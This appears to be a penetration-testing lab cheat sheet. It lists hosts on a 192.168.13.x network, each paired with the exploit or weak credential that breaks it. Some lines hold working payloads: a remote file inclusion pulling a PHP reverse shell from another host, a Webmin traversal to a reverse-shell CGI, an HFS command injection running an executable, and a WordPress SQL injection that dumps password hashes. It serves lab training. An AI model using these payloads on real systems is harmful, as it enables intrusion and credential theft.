192.168.13.201 Windows XP client SMB MS08-067

192.168.13.202 Ubuntu Server RFI - priv:Linux Kernel

<

= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

192.168.13.203 Windows 2000 server WebDav

192.168.13.204 Windows 2000 server WebDav

192.168.13.205 Windows 2000 server pass the hash from 206

192.168.13.206 Windows 2000 server SMB MS08-067

192.168.13.207 Windows XP client

192.168.13.208 Linux 2.4.X server RFI - priv:Linux Kernel

<

= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

192.168.13.209 OpenSolaris device tomcat - default account

192.168.13.210 Windows 2003 server coldfusion 8

192.168.13.214 Linux 3.X server

192.168.13.215 Linux redhat samba 2.2.7a

192.168.13.216 FreeBSD 7.X device csm php lite admin

192.168.13.218 Windows 2008 server

192.168.13.219 Linux 3.X server

192.168.13.220 Windows 7 client

192.168.13.221 Windows 2008 server

192.168.13.222 ExtremeXOS 12.X device Samba 2.2.3a

192.168.13.223 Windows 2008 server

192.168.13.224 embedded device LFI NIKTO - brute force : bob user bob password

192.168.13.225 Windows 2000 server telnet 192.168.13.225:123 --

>

MiniShare /windows/remote/616.c

192.168.13.226 Windows 2003 server using metasploit be fast kill python.exe and migrate the process

192.168.13.227 Windows 2000 server SMB MS08-067

192.168.13.229 Windows 2003 server SMB MS08-067

192.168.13.230 NetWare 6.X device

192.168.13.231 Windows 2003 server SMB MS08-067

192.168.13.234 Linux 2.6.X server https://www.exploit-db.com/exploits/15704/

192.168.13.235 Linux 2.6.X server http://192.168.13.235/section.php?page=http://192.168.12.137/reverse\_php.txt

192.168.13.236 embedded device

192.168.13.237 Linux 2.6.X server https://www.exploit-db.com/exploits/18650/

192.168.13.238 Linux 3.X server

192.168.13.239 Windows 2008 server ms09_050_smb2_negotiate_func_index

192.168.13.241 Linux 2.6.X server http://192.168.13.241:10000/unauthenticated/..%01/..%01/%01/..%01/..%01/..%01/..%01/..%01//tmp/perl-reverse-shell.cgi

192.168.13.242 Linux 2.6.X server alice user alice

192.168.13.244 Linux 2.6.X server

192.168.13.245 Windows 2008 server ms09_050_smb2_negotiate_func_index

192.168.13.247 Windows 2000 server

192.168.13.249 Android 2.X device FTP Pro

192.168.13.250 Windows Vista client http://192.168.13.250:9505/?search={.exec\|C:\Users\Public\Downloads\crypt.exe.}

192.168.13.251 Linux 2.6.X server http://192.168.13.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group\_concat%28user\_login,0x3a,user\_pass%29+from+wp\_users%23

192.168.13.252 Linux 2.6.X server Time Sheet https://www.exploit-db.com/exploits/1518/

results matching ""

    No results matching ""